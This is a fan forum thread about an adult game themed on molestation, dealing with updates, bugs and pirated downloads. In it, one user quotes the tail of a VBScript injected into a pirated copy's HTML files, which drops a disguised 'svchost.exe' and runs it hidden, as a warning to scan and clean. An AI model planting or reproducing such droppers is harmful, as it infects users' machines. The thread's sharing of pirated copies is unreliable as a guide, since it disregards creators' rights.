What's new

SIM [SOUTH TREE] 痴漢の衝動if / Urge to Molest if(RJ245378)

letronixRULES

Demon Girl
Reputation score
I think, that is some of the errors that he fixed in the current version, which is 1.11, bah, it's more or less me assuming, considering on the google translate said "fixed some problems" so the screen/graphical glitches could come from it. Other than that, so far for me at least, I haven't had that issue at the moment.

letronixRULES

Demon Girl
Reputation score
Huh... so apparently the game didn't get an update but more or less on the DLsite page it shows that the game got some bugfixes to problems on April 16th. Unless the dev decides to further upgrade the game, still I feel it odd unless he can provide the files for those "fixed problems" oh well, time will tell I suppose. :unsure:

EDIT: Actually scratch that, nevermind SOUTH TREE posted on his blog and seems like said bugfix, which from what I gathered from his post, seems to fix a bug around the main story during Natsu's scene around the 09:40 mark, and also some minor corrections in the text, that seemed to him to be "funny" in any case, so yeah technically speaking this is now Version 1.12. In any case here is the link with the version update post below.

Last edited:

Harleyquin13

Tentacle God
Reputation score
V 1.12: Freeze bug in Natsu 2nd part (Sumata at 9:40 mark) fixed.
Some actions executed when the second girl was unconscious didn't work as intended. Now fixed in this version.
Miscellaneous minor bugs fixed.

DenabuNeko

Reputation score
Anyone else having issues with the game freezing up, slowing down, graphical glitches, etc when they try to full screen?
Yeah I have this issue too, I also had it with the demo iirc. I'm having another issue as well that makes the game not that enjoyable; No audio at all! The program doesn't even seem to be trying to output any audio, as it doesn't even show up in the Volume Mixer. I didn't have this issue with the demo but I do with ver 1.11. Anyone else experiencing this? Any ideas on fixing it?

Edit: I fixed the audio issue by placing the 32bit files in with the normal ones and playing the 32bit version instead, even though I'm on Win10 64bit. As long as it works, I don't really care :p

Last edited:

The Bomb

Jungle Girl
Reputation score
Ver. 2.0 has been released on DLsite with 30% discount . . .

iamnuff

Tentacle God
Reputation score
As far as I can tell, V2 is just a set of extra costumes? If there are more scenes, I don't know how to unlock them.

Tenchi757

Demon Girl
Reputation score
Found 2.0 on AS. HTML files were infected for 64-bit only but I removed and replaced them. 32-bit was clean. Game works and Windows Defender reports clean. Let me know if you detect anything.

English partial still works. Mega link below.

Attachments

azertytripleh

Reputation score
Found 2.0 on AS. HTML files were infected for 64-bit only but I removed and replaced them. 32-bit was clean. Game works and Windows Defender reports clean. Let me know if you detect anything.

I have issue with version 2.00 64-bits, the save and load options don't work at all.
When I click on save or load, nothing happen. No screen show up.
I allready try to change the regional settings, and to use apploc and NTLEAS but the issue is still here.
Only the 32-bits works fine.
C01.JPG C02.JPG
Does anyone else have the same problem? I use Win 7 Pro 64-bits and Win 10 Pro 64-bits. (Two laptops)

Tenchi757

Demon Girl
Reputation score
I have issue with version 2.00 64-bits, the save and load options don't work at all.
When I click on save or load, nothing happen. No screen show up.
I allready try to change the regional settings, and to use apploc and NTLEAS but the issue is still here.
Only the 32-bits works fine.
View attachment 26563 View attachment 26564
Does anyone else have the same problem? I use Win 7 Pro 64-bits and Win 10 Pro 64-bits. (Two laptops)
It works for me on 64-bit. You can try to make sure your .sav file is not read-only. Make sure your regional setting is Japanese *and* your date format is Japanese. Some games require it, some don't. Otherwise I don't know what's wrong. If 32-bit works just use that /shrug.

Oh, stupid suggestion, but make sure your save data is in the 64-bit folder!

azertytripleh

Reputation score
ok, I found: I downloaded an infected version .
After a scan of my antivirus the following files were declared malicious :
- credits.html
- index.html
- tyrano\html\backlog.html
- tyrano\html\load.html
- tyrano\html\menu.html
- tyrano\html\save.html

I compared them with those from version 1.11 and they all have suspicious lines at the end :
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WSHshell.Run DropPath, 0
//--></SCRIPT>

I suggest to anyone who has downloaded version 2.00, to scan it and clean their computers.
Delete the infected files and replace them with those of version 1.11.

And if it helps, I'll give you those of version 1.11.
Sorry, I speak very bad English.

Attachments

Tenchi757

Demon Girl
Reputation score
Probably the version from Anime sharing. I already posted a cleaned version but yea. Scan your files!

Zedascove

Reputation score

Thanks!

Tai Tai

Demon Girl
Reputation score
This thread is for game discussion only.
Sorry for necroing, but is there an update on a full English translation yet?